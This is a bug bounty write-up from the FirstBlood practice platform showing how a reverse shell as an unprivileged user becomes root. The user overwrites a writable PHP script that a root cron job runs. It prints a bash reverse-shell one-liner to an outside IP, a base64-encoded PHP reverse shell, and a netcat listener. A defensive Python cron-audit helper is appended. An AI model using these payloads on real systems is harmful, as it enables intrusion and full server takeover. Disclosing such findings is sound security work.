FirstBlood-#692 Becoming root on the server
This issue was discovered on FirstBlood v2
On 2021-10-27, panya Level 7 reported:

As I reported in https://www.bugbountyhunter.com/hackevents/report?id=475 the site contains an insecure deserialization vulnerability which leads to RCE.

After I exploited it and popped a reverse shell with this payload:

/bin/bash -c 'bash -i >& /dev/tcp/157.230.125.192/1234 0>&1'

I noticed that the current user is fb-exec (non-privileged).

After navigating through the file system and reading files, I found the file scheduler.php with this comment:

/*
Tell Raymond on the server team to turn off the crontab until we need it
-Patrice
*/

I checked cron jobs and found this one (in the /etc/cron.d/firstblood file):

* * * * * root cd /app/firstblood && php scheduler.php >> /dev/null 2>&1

So this scheduler.php file is executed via php by the root user every minute.

And the fb-exec user can write to this file.

So to become root on this server, we can write another reverse shell payload to this file:

echo PD9waHAgc3lzdGVtKCIvYmluL2Jhc2ggLWMgJ2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTU3LjIzMC4xMjUuMTkyLzEyMzQgMD4mMSciKTsgPz4= | base64 -d > scheduler.php

where PD9waHAgc3lzdGVtKCIvYmluL2Jhc2ggLWMgJ2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTU3LjIzMC4xMjUuMTkyLzEyMzQgMD4mMSciKTsgPz4= is our base64-encoded PHP reverse shell code:

<?php system("/bin/bash -c 'bash -i >& /dev/tcp/157.230.125.192/1234 0>&1'"); ?>

And after running nc -nvlp 1234 on my server (157.230.125.192) and waiting a bit, I got the root shell:

id
uid=0(root) gid=0(root) groups=0(root)

P1 CRITICAL

FirstBlood ID: 35
Vulnerability Type: RCE

A cron job is set to execute the file /app/firstblood/scheduler.php every minute as the root user. This file is writable by the FirstBlood PHP pool user (fb-exec). The [checkproof bug] can be combined with this to obtain root privileges.
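As an added defensive example (not code from the report or from the FirstBlood platform), the following Python audit helper reads /etc/cron.d-style entries like the one above, resolves the script each command runs, and flags any script that a non-root user could modify, which is the condition this finding relies on. The cron lines and the (uid, mode) lookup table in it are constructed so it runs offline; on a live host the default lookup uses os.stat.

```python
import os
import re
import stat
# Hypothetical audit helper, not code from the FirstBlood report. /etc/cron.d lines read
# "<5 schedule fields | @special> <user> <command>"; flag scripts a non-root user can modify.
CRON_D_RE = re.compile(r"^(@\w+\s+|(?:\S+\s+){5})(\S+)\s+(.+)$")
INTERPRETERS = {"php", "python", "python3", "bash", "sh", "perl"}

def script_path_from_command(command):
    """Script a cron command runs, resolved against a leading 'cd DIR &&'; None if unknown."""
    cwd = "/"
    for part in command.split("&&"):
        tokens = part.strip().split()
        if tokens and tokens[0] == "cd" and len(tokens) > 1:
            cwd = tokens[1]
        elif tokens and tokens[0] in INTERPRETERS and len(tokens) > 1 and not tokens[1].startswith("-"):
            return os.path.normpath(os.path.join(cwd, tokens[1]))
    return None

def host_stat(path):
    """Live lookup for a real host: (uid, mode) of path, or None if it cannot be read."""
    try:
        st = os.stat(path)
        return st.st_uid, st.st_mode
    except OSError:
        return None

def audit_cron_d(lines, stat_fn=host_stat):
    """One finding per entry whose script is owned by a non-root uid or is group/world-writable."""
    findings = []
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or VAR=value assignment
        m = CRON_D_RE.match(line)
        path = script_path_from_command(m.group(3)) if m else None
        info = stat_fn(path) if path else None
        if info is None:
            continue
        uid, mode = info
        reason = f"owned by uid {uid}" if uid else ("group/world-writable" if mode & (stat.S_IWGRP | stat.S_IWOTH) else None)
        if reason:
            findings.append({"user": m.group(2), "script": path, "reason": reason})
    return findings
# Constructed sample: the report's entry plus a benign one; scheduler.php owned by non-root uid 1001.
SAMPLE_CRON_D = ["SHELL=/bin/bash",
                 "* * * * * root cd /app/firstblood && php scheduler.php >> /dev/null 2>&1",
                 "0 3 * * * root php /app/firstblood/cleanup.php"]
FAKE_STAT = {"/app/firstblood/scheduler.php": (1001, 0o100644), "/app/firstblood/cleanup.php": (0, 0o100644)}
FINDINGS = audit_cron_d(SAMPLE_CRON_D, FAKE_STAT.get)  # one finding: root runs a script uid 1001 owns
```

To run it against a real host, read the entries with `open("/etc/cron.d/firstblood").readlines()` and leave `stat_fn` at its default.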